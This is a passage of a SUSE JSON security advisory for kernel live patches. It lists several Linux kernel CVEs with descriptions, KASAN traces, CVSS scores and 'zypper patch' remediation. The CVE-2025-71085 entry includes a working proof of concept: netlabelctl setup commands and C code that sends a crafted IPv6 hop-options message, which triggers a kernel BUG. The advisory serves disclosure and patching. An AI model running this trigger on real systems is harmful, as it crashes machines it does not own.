"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T04:04:40Z",
"details": "important"
}
],
"title": "CVE-2025-40258"
},
{
"cve": "CVE-2025-40284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: MGMT: cancel mesh send timer when hdev removed\n\nmesh_send_done timer is not canceled when hdev is removed, which causes\ncrash if the timer triggers after hdev is gone.\n\nCancel the timer when MGMT removes the hdev, like other MGMT timers.\n\nShould fix the BUG: sporadically seen by BlueZ test bot\n(in \"Mesh - Send cancel - 1\" test).\n\nLog:\n------\nBUG: KASAN: slab-use-after-free in run_timer_softirq+0x76b/0x7d0\n...\nFreed by task 36:\n kasan_save_stack+0x24/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3a/0x60\n __kasan_slab_free+0x43/0x70\n kfree+0x103/0x500\n device_release+0x9a/0x210\n kobject_put+0x100/0x1e0\n vhci_release+0x18b/0x240\n------",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40284",
"url": "https://www.suse.com/security/cve/CVE-2025-40284"
},
{
"category": "external",
"summary": "SUSE Bug 1254860 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1254860"
},
{
"category": "external",
"summary": "SUSE Bug 1257669 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1257669"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T04:04:40Z",
"details": "important"
}
],
"title": "CVE-2025-40284"
},
{
"cve": "CVE-2025-40297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: bridge: fix use-after-free due to MST port state bypass\n\nsyzbot reported[1] a use-after-free when deleting an expired fdb. It is\ndue to a race condition between learning still happening and a port being\ndeleted, after all its fdbs have been flushed. The port\u0027s state has been\ntoggled to disabled so no learning should happen at that time, but if we\nhave MST enabled, it will bypass the port\u0027s state, that together with VLAN\nfiltering disabled can lead to fdb learning at a time when it shouldn\u0027t\nhappen while the port is being deleted. VLAN filtering must be disabled\nbecause we flush the port VLANs when it\u0027s being deleted which will stop\nlearning. This fix adds a check for the port\u0027s vlan group which is\ninitialized to NULL when the port is getting deleted, that avoids the port\nstate bypass. When MST is enabled there would be a minimal new overhead\nin the fast-path because the port\u0027s vlan group pointer is cache-hot.\n\n[1] https://syzkaller.appspot.com/bug?extid=dd280197f0f7ab3917be",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40297",
"url": "https://www.suse.com/security/cve/CVE-2025-40297"
},
{
"category": "external",
"summary": "SUSE Bug 1255187 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255187"
},
{
"category": "external",
"summary": "SUSE Bug 1255895 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255895"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T04:04:40Z",
"details": "important"
}
],
"title": "CVE-2025-40297"
},
{
"cve": "CVE-2025-68284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds writes in handle_auth_session_key()\n\nThe len field originates from untrusted network packets. Boundary\nchecks have been added to prevent potential out-of-bounds writes when\ndecrypting the connection secret or processing service tickets.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68284",
"url": "https://www.suse.com/security/cve/CVE-2025-68284"
},
{
"category": "external",
"summary": "SUSE Bug 1255377 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "external",
"summary": "SUSE Bug 1255378 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255378"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T04:04:40Z",
"details": "important"
}
],
"title": "CVE-2025-68284"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T04:04:40Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T04:04:40Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
